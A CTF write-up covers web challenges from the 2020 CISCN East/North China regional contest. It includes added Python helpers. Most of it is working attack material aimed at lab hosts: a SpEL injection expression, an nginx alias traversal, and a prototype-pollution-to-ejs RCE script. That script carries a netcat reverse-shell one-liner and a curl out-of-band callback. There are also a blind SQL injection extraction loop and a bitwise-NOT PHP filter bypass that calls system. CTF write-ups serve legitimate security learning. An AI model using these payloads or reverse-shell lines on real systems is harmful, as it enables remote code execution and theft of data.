2020 CISCN East/North China Regional Web Challenge Writeups

Preface: 2333

Day1

web3

Just requesting flag.php directly works.

The intended solution was probably the request below. The parameter values suggest the usual checks: s1 is read through the data:// stream wrapper (the base64 decodes to "first blood"), s2=0e215962017 is an md5 "magic" value whose md5 is itself a 0e-prefixed digit string, so the value and its own hash loose-compare equal in PHP, and the file to read is supplied in the POST body:

POST /huadongbei/cat.php?s1=data://text/plain;base64,Zmlyc3QgYmxvb2Q=&s2=0e215962017&s3=SHELL.TXT HTTP/1.1
Host: 192.168.43.44
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 13
Content-Type: application/x-www-form-urlencoded

file=flag.php
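Offline checks for the pieces of that request, as an added example that is not part of the original writeup: it decodes the data:// value the way file_get_contents() would, emulates PHP's loose string comparison to confirm that s2 is loose-equal to its own md5, and pulls the parameters out of a constructed copy of the request line. The numeric-string rule is a simplified version of PHP's.

```python
"""Offline checks for the intended web3 request (added example, not code
from the writeup): data:// decoding and PHP loose-comparison emulation."""
import base64
import hashlib
import re
from urllib.parse import unquote

# Constructed copy of the request line from the captured request above.
REQUEST_LINE = ("POST /huadongbei/cat.php?s1=data://text/plain;base64,Zmlyc3QgYmxvb2Q="
                "&s2=0e215962017&s3=SHELL.TXT HTTP/1.1")

# Simplified PHP numeric-string rule: optional whitespace, sign, decimals,
# exponent.  Enough for the 0e... case; hex strings are not numeric.
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_is_numeric(s: str) -> bool:
    return _NUMERIC.match(s) is not None


def php_loose_eq(a: str, b: str) -> bool:
    """PHP `==` on two strings: two numeric strings are compared as numbers,
    anything else is compared as bytes."""
    if php_is_numeric(a) and php_is_numeric(b):
        return float(a) == float(b)
    return a == b


def md5_loose_equals_self(s: str) -> bool:
    """True when md5($s) == $s under loose comparison, i.e. both sides are
    0e<digits> strings that evaluate to zero."""
    return php_loose_eq(s, hashlib.md5(s.encode()).hexdigest())


def read_data_uri(uri: str) -> bytes:
    """What file_get_contents() returns for a data:...;base64,<payload> value."""
    if not uri.startswith("data:"):
        raise ValueError("not a data: URI")
    header, _, payload = uri.partition(",")
    if header.endswith(";base64"):
        return base64.b64decode(payload)
    return unquote(payload).encode()


def parse_request_line(line: str) -> dict:
    """Decoded query parameters of an HTTP request line (first '=' splits
    key from value, so a trailing '=' in base64 survives)."""
    target = line.split(" ")[1]
    query = target.split("?", 1)[1]
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params
```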

web4

SpEL expression injection. The expression reads /flag.txt with java.nio.file.Files.lines and takes the first line; 1.class is the java.lang.Integer Class object, which gives access to Class.forName without writing T(...):

1.class.forName("java.nio.file.Files").lines(1.class.forName("java.nio.file.Paths").get("/flag.txt")).toArray()[0]

The script version inserts a null byte (\x00) after the method names lines and get:


# -*- coding: UTF-8 -*-
import requests

url = "http://172.20.7.104:8080"
# Same expression as above, with a null byte after the `lines` and `get`
# method names; toArray()[0] returns the first line of /flag.txt.
payload = ('1.class.forName("java.nio.file.Files").lines\x00('
           '1.class.forName("java.nio.file.Paths").get\x00("/flag.txt")'
           ').toArray()[0]')
proxies = {"http": "http://127.0.0.1:8080"}   # route through Burp
data = {"expr": payload}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
resp = requests.post(url, data=data, headers=headers, proxies=proxies)
print(resp.content)


web7

Reference:

Nginx alias misconfiguration leading to directory traversal

The nginx config is wrong and lets you read files. `location /static` has no trailing slash while `alias /app/static/` does, so nginx takes whatever follows /static in the URI and appends it to the alias path: a request for /static../ resolves to /app/static/../, i.e. /app/, and with autoindex on the application directory behind the proxy can be listed and read:

# /etc/nginx/conf.d/default.conf
server {
    listen 80;
    server_name _;
    location /static {
        autoindex on;
        alias /app/static/;
    }
    location / {
        proxy_pass http://127.0.0.1:3000;
    }
}
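An emulation of how nginx maps a request URI through a prefix `location` with `alias`, as an added example (not code from the writeup or from nginx): it reproduces the vulnerable mapping above, shows why a plain /static/../ traversal does not work while /static../ does, and checks the fixed form of the location (trailing slash added). The two config dicts are constructed for the example.

```python
"""Emulation of nginx prefix-location + alias path mapping (added example,
not part of the writeup).  Shows why `location /static` + `alias /app/static/`
exposes /app/ and why `location /static/` does not."""
import posixpath

# Constructed: the vulnerable mapping from the config above and the fixed one.
VULNERABLE = {"location": "/static", "alias": "/app/static/"}
FIXED = {"location": "/static/", "alias": "/app/static/"}


def normalize_uri(uri: str) -> str:
    """nginx resolves '.' and '..' *segments* of the request URI before
    matching locations.  A segment such as 'static..' is not a '..' segment
    and is left untouched, which is what the bypass relies on."""
    out = []
    for seg in uri.split("/"):
        if seg == "..":
            if out:
                out.pop()
        elif seg not in ("", "."):
            out.append(seg)
    return "/" + "/".join(out) + ("/" if uri.endswith("/") else "")


def resolve_alias(cfg: dict, uri: str):
    """Filesystem path nginx would serve for `uri`, or None when the prefix
    location does not match.  With `alias`, the part of the URI after the
    location prefix is appended to the alias path verbatim."""
    uri = normalize_uri(uri)
    loc, alias = cfg["location"], cfg["alias"]
    if not uri.startswith(loc):
        return None
    rest = uri[len(loc):]
    return posixpath.normpath(alias + rest)


def escapes_alias(cfg: dict, uri: str) -> bool:
    """True when the served path lies outside the alias directory."""
    path = resolve_alias(cfg, uri)
    root = posixpath.normpath(cfg["alias"])
    return path is not None and not (path == root or path.startswith(root + "/"))
```

The fix is either `location /static/ { alias /app/static/; }` (prefix and alias both slash-terminated) or `location /static { root /app; }`, where the whole URI is appended under the root and the mismatch cannot arise.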

express-fileupload prototype pollution -> ejs template RCE. A multipart field named `__proto__.outputFunctionName` is split on the dots by express-fileupload's parseNested option and written as nested objects, which in JavaScript lands on Object.prototype; ejs's compile step then reads outputFunctionName from its options and emits `var <outputFunctionName> = __append;` into the generated template function, so the polluted value runs as code. That is why the payload starts with `_tmp1;` and ends with `var __tmp`: both ends of the emitted line stay syntactically valid around the injected exec() call.

POST /4_pATh_y0u_CaNN07_Gu3ss HTTP/1.1
Host: 172.20.7.107
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykhBq9JNmc6ZBCe9M
Content-Length: 261

------WebKitFormBoundarykhBq9JNmc6ZBCe9M
Content-Disposition: form-data; name="__proto__.outputFunctionName";

_tmp1;global.process.mainModule.require('child_process').exec("cat /flag.txt > aa");var __tmp
------WebKitFormBoundarykhBq9JNmc6ZBCe9M--


# -*- coding: UTF-8 -*-
import requests

url = "http://172.20.7.107/4_pATh_y0u_CaNN07_Gu3ss"

# Reverse shell.  The string lands in ejs's generated code as
#   var _tmp1;<exec(...)>;var __tmp2 = __append;
# An out-of-band check such as exec("curl xxxx:6666") works the same way.
payload = ("_tmp1;global.process.mainModule.require('child_process')"
           ".exec('rm /tmp/fa;mkfifo /tmp/fa;cat /tmp/fa|/bin/sh -i 2>&1|nc xxx 6666 > /tmp/fa ');"
           "var __tmp2")
# A dotted field name: express-fileupload's parseNested turns it into
# nested objects and pollutes Object.prototype.
files = {
    "__proto__.outputFunctionName": (None, payload)
}
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
resp = requests.post(url, files=files, proxies=proxies)
print(resp.text)
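To see why the payload has that shape, here is an added example (not code from the writeup, express-fileupload or ejs) that reproduces the one line of ejs's compile() which consumes outputFunctionName, builds the `_tmp1;...;var __tmp` value for an arbitrary command, mimics the parseNested key splitting, and encodes the multipart body that delivers it. The boundary and command are constructed; the ejs line is quoted from lib/ejs.js.

```python
"""Shape of the express-fileupload -> ejs payload (added example, not from
the writeup).  Reconstructs the generated JavaScript so the payload can be
checked before it is sent."""


# ejs lib/ejs.js, compile(): when opts.outputFunctionName is set it does
#   prepended += '  var ' + opts.outputFunctionName + ' = __append;' + '\n';
def ejs_prelude(output_function_name: str) -> str:
    return "  var " + output_function_name + " = __append;\n"


def js_string(s: str) -> str:
    """Double-quoted JS string literal with backslash and quote escaped."""
    return '"' + s.replace("\\", "\\\\").replace('"', '\\"') + '"'


def rce_payload(command: str) -> str:
    """Terminate the `var` statement ejs opened, run a command, then open a
    fresh `var __tmp` so ejs's trailing ` = __append;` still parses."""
    return ("_tmp1;global.process.mainModule.require('child_process')"
            ".exec(" + js_string(command) + ");var __tmp")


def generated_line(command: str) -> str:
    """The JavaScript ejs actually emits once outputFunctionName is polluted."""
    return ejs_prelude(rce_payload(command))


def parse_nested_key(name: str, value):
    """Emulate express-fileupload's parseNested: 'a.b.c' -> {a: {b: {c: value}}}.
    In JavaScript the leading '__proto__' segment resolves to Object.prototype,
    so the write is global; in Python it is just a dict."""
    result = value
    for part in reversed(name.split(".")):
        result = {part: result}
    return result


def multipart_body(boundary: str, fields: dict) -> bytes:
    """Minimal multipart/form-data encoder for plain text fields (constructed)."""
    out = []
    for name, value in fields.items():
        out.append("--" + boundary + "\r\n"
                   'Content-Disposition: form-data; name="' + name + '"\r\n\r\n'
                   + value + "\r\n")
    out.append("--" + boundary + "--\r\n")
    return "".join(out).encode()
```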

Day2

web2

Boolean-based blind SQL injection in the login form. `username=admin\` leaves a trailing backslash that escapes the quote closing the username literal, so the password value is spliced into the query unquoted; `||ascii(right(password,n))/**/>/**/N#` then ORs in a comparison, with `/**/` standing in for spaces and `#` dropping the rest of the query. A response containing "error" is the false branch. The script binary-searches each of the 12 password characters; right(password, n) with decreasing n walks the string from the first character to the last, without using substr/mid:

# encoding=utf-8
import requests

url = "http://172.20.7.102/index.php"
proxies = {
    "http": "http://127.0.0.1:8080",
}
flag = ""

# binary search, one character at a time
for i in range(1, 13):
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        # right(password, 13-i) is the suffix starting at character i;
        # ascii() only looks at its first character
        payload = "||ascii(right(password,{}))/**/>/**/{}#"
        payload = payload.format((13 - i), mid)
        data = {
            "username": "admin\\",   # trailing backslash eats the closing quote
            "password": payload
        }
        print(payload)
        r = requests.post(url, data=data, proxies=proxies)
        # print(r.content)
        if "error" not in r.text:   # comparison was true: char > mid
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    flag += chr(mid)
    print(flag)
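The same search in a form that can be tested before it touches the target, as an added example that is not from the writeup: the payload builder and binary search are separated from the HTTP request, which is replaced by an oracle callable. The fake oracle and the 12-character secret are constructed; against the real target the oracle would be the POST plus the "error" check from the script above.

```python
"""Oracle-driven version of the blind extraction loop above (added example,
not from the writeup): payload construction and binary search, verified
offline against a constructed secret."""
import re
from typing import Callable

# Constructed stand-in for the admin password on the target (12 characters,
# the length the original script assumes).
FAKE_PASSWORD = "Pa5sW0rd!ab_"


def build_payload(position: int, length: int, threshold: int) -> str:
    """Password-field value asking "is character `position` (1-based) > threshold?".
    right(password, n) avoids substr/mid, ascii() reads the suffix's first
    character, /**/ replaces spaces and # comments out the rest of the query."""
    n = length - position + 1
    return "||ascii(right(password,{}))/**/>/**/{}#".format(n, threshold)


_PAYLOAD = re.compile(r"\|\|ascii\(right\(password,(\d+)\)\)/\*\*/>/\*\*/(\d+)#")


def fake_oracle(payload: str) -> bool:
    """Stand-in for the HTTP request: evaluates the injected comparison
    against FAKE_PASSWORD and returns True when the page would NOT say "error"
    (MySQL's right() returns the whole string when n exceeds its length)."""
    m = _PAYLOAD.fullmatch(payload)
    n, threshold = int(m.group(1)), int(m.group(2))
    suffix = FAKE_PASSWORD[-n:] if n else ""
    return bool(suffix) and ord(suffix[0]) > threshold


def extract_char(oracle: Callable[[str], bool], position: int, length: int,
                 low: int = 32, high: int = 127) -> str:
    """Binary search one character; invariant: low <= code <= high."""
    while high > low:
        mid = (low + high) // 2
        if oracle(build_payload(position, length, mid)):   # code > mid
            low = mid + 1
        else:                                              # code <= mid
            high = mid
    return chr(low)


def extract(oracle: Callable[[str], bool], length: int) -> str:
    """Recover all `length` characters, first to last."""
    return "".join(extract_char(oracle, i, length) for i in range(1, length + 1))
```

Each character costs at most seven requests for the printable range; the search only terminates correctly because the oracle answers a strict `>` and the loop moves `low` past `mid` on a true answer, so an inverted oracle (treating "error" as true) would converge on wrong characters rather than failing loudly.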


Login. After logging in there is a PHP eval sandbox with a character blacklist, plus every internal function name blocked by a regex substring match:

<?php
error_reporting(0);
if(!isset($_GET['gzmtu'])){
    highlight_file(__FILE__);
}else{
    $gzmtu = $_GET['gzmtu'];
    if (preg_match('/(f|l|a|g|\.|t|x|\/|;|\"|\'|\`|\||\[|\]|\_|\^|=)/i',$gzmtu)) {
        die('forbidden');
    }
    $blacklist = get_defined_functions()['internal'];
    foreach ($blacklist as $blackitem) {
        if (preg_match ('/' . $blackitem . '/im', $gzmtu)) {
            die('nonono!');
        }
    }
    eval('echo '.$gzmtu.';');
}

Bypass with bitwise NOT. Neither `~`, `(`, `)` nor any byte above 0x7f is in the character blacklist, and the function-name check only ever sees the inverted bytes. Sent raw in the URL, each inverted string is parsed by PHP 7 as an (undefined) constant name, which it silently treats as a bare string, and `~` flips the bytes back at runtime, so `(~"system")(~"cat /flag.txt")` becomes a variable-function call (PHP 8 would throw on the undefined constant instead):

http://172.20.7.102/c2ZtdHFs.php?gzmtu=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98%D1%8B%87%8B)

which evaluates to: system("cat /flag.txt")
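A builder and checker for that bypass, as an added example that is not part of the writeup: it produces the `~%XX...` form of any string, decodes it back to what PHP's `~` yields, and runs a candidate through the character blacklist copied from the challenge source plus a constructed stand-in for get_defined_functions()['internal'] (the real list depends on the target's PHP build). The function list here is an assumption; the character regex is the page's own.

```python
"""Bitwise-NOT payload builder and blacklist checker (added example, not
from the writeup).  Encodes strings as ~%XX..., decodes them, and tests
candidates against the challenge's two filters."""
import re
from urllib.parse import unquote_to_bytes

# Character blacklist copied from the challenge source (case-insensitive).
CHAR_BLACKLIST = re.compile(r'(f|l|a|g|\.|t|x|\/|;|\"|\'|\`|\||\[|\]|\_|\^|=)', re.I)
# Constructed subset of PHP internal function names.  On the target the
# list is whatever get_defined_functions()['internal'] returns.
INTERNAL_FUNCS = ["system", "exec", "passthru", "shell_exec", "popen",
                  "file_get_contents", "readfile", "ord", "chr", "md5"]


def php_not_encode(s: str) -> str:
    """`~` followed by the byte-wise complement of s, percent-encoded for the URL."""
    return "~" + "".join("%{:02X}".format((~b) & 0xFF) for b in s.encode())


def php_not_decode(token: str) -> str:
    """Inverse: the string PHP's ~ produces at runtime from the raw bytes."""
    raw = unquote_to_bytes(token[1:])
    return bytes((~b) & 0xFF for b in raw).decode()


def call_payload(func: str, arg: str) -> str:
    """(~func)(~arg) exactly as the URL above sends it."""
    return "(" + php_not_encode(func) + ")(" + php_not_encode(arg) + ")"


def as_php_source(payload: str) -> str:
    """What $_GET['gzmtu'] holds after URL decoding: raw bytes, viewed as
    latin-1 so the high bytes survive as single characters."""
    return unquote_to_bytes(payload).decode("latin-1")


def blocked_by_filter(candidate: str):
    """First filter response for `candidate`, or None when it passes.
    Mirrors the source: a character regex, then preg_match('/<name>/im')
    for every internal function name, i.e. an unanchored substring match."""
    if CHAR_BLACKLIST.search(candidate):
        return "forbidden"
    for name in INTERNAL_FUNCS:
        if re.search(name, candidate, re.I | re.M):
            return "nonono!"
    return None
```

The function-name check is a substring match, so even harmless input containing "ord" or "chr" is rejected; the complemented bytes dodge both filters because no ASCII letter survives in the request, and the decode happens inside eval where no filter runs.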


web5

PostgreSQL injection, didn't manage to solve it......

web6

Only realized during the patching phase that this was SSRF.

There's an ssrf.php; reportedly file:///flag is enough to get the flag.